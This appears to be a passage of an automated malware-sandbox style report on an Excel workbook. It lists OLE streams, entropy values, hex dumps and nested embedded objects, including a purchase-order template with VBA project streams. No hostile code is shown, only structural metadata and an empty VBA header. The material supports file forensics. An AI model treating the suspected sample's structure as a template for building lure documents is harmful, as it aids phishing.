                            VBA File Name:ThisWorkbook.cls
                            Stream Size:985
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! g . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 21 8a 67 9d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            VBA Code
                            Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                            Streams

                            Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                            General
                            Stream Path:\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.25248375192737
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:244
                            Entropy:2.889430592781307
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                            General
                            Stream Path:\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:200
                            Entropy:3.2465758799941646
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . J . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                            Stream Path: MBD00016415/\x1CompObj, File Type: data, Stream Size: 94
                            General
                            Stream Path:MBD00016415/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:94
                            Entropy:4.345966460061678
                            Base64 Encoded:False
                            Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: MBD00016415/\x1Ole, File Type: data, Stream Size: 20
                            General
                            Stream Path:MBD00016415/\x1Ole
                            CLSID:
                            File Type:data
                            Stream Size:20
                            Entropy:0.5689955935892812
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . .
                            Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: MBD00016415/CONTENTS, File Type: PDF document, version 1.3, 1 pages, Stream Size: 29526
                            General
                            Stream Path:MBD00016415/CONTENTS
                            CLSID:
                            File Type:PDF document, version 1.3, 1 pages
                            Stream Size:29526
                            Entropy:7.810444862277873
                            Base64 Encoded:True
                            Data ASCII:% P D F - 1 . 3 . % . . 1 0 o b j . < < . / T y p e / P a g e . / M e d i a B o x [ 0 0 6 1 1 . 2 8 7 9 0 . 9 2 ] . / C r o p B o x [ 0 0 6 1 1 . 2 8 7 9 0 . 9 2 ] . / P a r e n t 2 0 R . / R o t a t e 0 / R e s o u r c e s < < . / P r o c S e t [ / P D F / I m a g e C / I m a g e B / I m a g e I ] . / X O b j e c t < < . / O b j 3 3 0 R > > . > > . / C o n t e n t s [ 4 0 R ] . > > . e n d o b j . 3 0 o b j . < < / T y p e / X O b
                            Data Raw:25 50 44 46 2d 31 2e 33 0d 25 e2 e3 cf d3 0d 0d 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 50 61 67 65 0a 2f 4d 65 64 69 61 42 6f 78 20 5b 30 20 30 20 36 31 31 2e 32 38 20 37 39 30 2e 39 32 5d 0a 2f 43 72 6f 70 42 6f 78 20 5b 30 20 30 20 36 31 31 2e 32 38 20 37 39 30 2e 39 32 5d 0a 2f 50 61 72 65 6e 74 20 32 20 30 20 52 0a 2f 52 6f 74 61 74 65 20 30 20 2f 52 65 73 6f 75
                            Stream Path: MBD00016416/\x1CompObj, File Type: data, Stream Size: 114
                            General
                            Stream Path:MBD00016416/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.25248375192737
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: MBD00016416/\x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                            General
                            Stream Path:MBD00016416/\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:244
                            Entropy:2.701136490257069
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                            Stream Path: MBD00016416/\x5SummaryInformation, File Type: data, Stream Size: 220
                            General
                            Stream Path:MBD00016416/\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:220
                            Entropy:3.372234242231489
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                            Stream Path: MBD00016416/MBD0018D4CE/\x1Ole, File Type: data, Stream Size: 20
                            General
                            Stream Path:MBD00016416/MBD0018D4CE/\x1Ole
                            CLSID:
                            File Type:data
                            Stream Size:20
                            Entropy:0.5689955935892812
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . .
                            Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: MBD00016416/MBD0018D4CE/\x3ObjInfo, File Type: data, Stream Size: 4
                            General
                            Stream Path:MBD00016416/MBD0018D4CE/\x3ObjInfo
                            CLSID:
                            File Type:data
                            Stream Size:4
                            Entropy:0.8112781244591328
                            Base64 Encoded:False
                            Data ASCII:. . . .
                            Data Raw:00 00 03 00
                            Stream Path: MBD00016416/MBD0018D4CE/Contents, File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c, Stream Size: 197671
                            General
                            Stream Path:MBD00016416/MBD0018D4CE/Contents
                            CLSID:
                            File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                            Stream Size:197671
                            Entropy:6.989042939766534
                            Base64 Encoded:True
                            Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: MBD00016416/MBD0068D442/\x1CompObj, File Type: data, Stream Size: 114
                            General
                            Stream Path:MBD00016416/MBD0068D442/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.219515110876372
                            Base64 Encoded:False
                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: MBD00016416/MBD0068D442/Package, File Type: Microsoft Excel 2007+, Stream Size: 26243
                            General
                            Stream Path:MBD00016416/MBD0068D442/Package
                            CLSID:
                            File Type:Microsoft Excel 2007+
                            Stream Size:26243
                            Entropy:7.635433729726103
                            Base64 Encoded:True
                            Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: MBD00016416/MBD007203CB/\x1CompObj, File Type: data, Stream Size: 114
                            General
                            Stream Path:MBD00016416/MBD007203CB/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.25248375192737
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: MBD00016416/MBD007203CB/\x5DocumentSummaryInformation, File Type: data, Stream Size: 248
                            General
                            Stream Path:MBD00016416/MBD007203CB/\x5DocumentSummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:248
                            Entropy:3.0523231150355867
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
                            Stream Path: MBD00016416/MBD007203CB/\x5SummaryInformation, File Type: data, Stream Size: 256
                            General
                            Stream Path:MBD00016416/MBD007203CB/\x5SummaryInformation
                            CLSID:
                            File Type:data
                            Stream Size:256
                            Entropy:4.086306928392587
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
                            Stream Path: MBD00016416/MBD007203CB/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 134792
                            General
                            Stream Path:MBD00016416/MBD007203CB/Workbook
                            CLSID:
                            File Type:Applesoft BASIC program data, first line number 16
                            Stream Size:134792
                            Entropy:7.974168320310173
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
                            Stream Path: MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 468
                            General
                            Stream Path:MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
                            CLSID:
                            File Type:ASCII text, with CRLF line terminators
                            Stream Size:468
                            Entropy:5.269289820125323
                            Base64 Encoded:True
                            Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
                            Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                            Stream Path: MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 83
                            General
                            Stream Path:MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
                            CLSID:
                            File Type:data
                            Stream Size:83
                            Entropy:3.0672749060249043
                            Base64 Encoded:False
                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
                            Stream Path: MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2486
                            General
                            Stream Path:MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                            CLSID:
                            File Type:data
                            Stream Size:2486
                            Entropy:3.9244127831265385
                            Base64 Encoded:False
                            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                            Stream Path: MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 536
                            General
                            Stream Path:MBD00016416/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
                            CLSID:
                            File Type:data
                            Stream Size:536
                            Entropy:6.330646364694152
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                            Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                            Stream Path: MBD00016416/MBD00726B69/\x1CompObj, File Type: data, Stream Size: 114
                            General
                            Stream Path:MBD00016416/MBD00726B69/\x1CompObj
                            CLSID:
                            File Type:data
                            Stream Size:114
                            Entropy:4.219515110876372
                            Base64 Encoded:False
                            Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: MBD00016416/MBD00726B69/Package, File Type: Microsoft Excel 2007+, Stream Size: 26242
                            General
                            Stream Path:MBD00016416/MBD00726B69/Package
                            CLSID:
                            File Type:Microsoft Excel 2007+
                            Stream Size:26242
                            Entropy:7.635424485665502
                            Base64 Encoded:True
                            Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Stream Path: MBD00016416/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 283872
                            General
                            Stream Path:MBD00016416/Workbook
                            CLSID:
                            File Type:Applesoft BASIC program data, first line number 16
                            Stream Size:283872
                            Entropy:7.743278150467805
                            Base64 Encoded:True
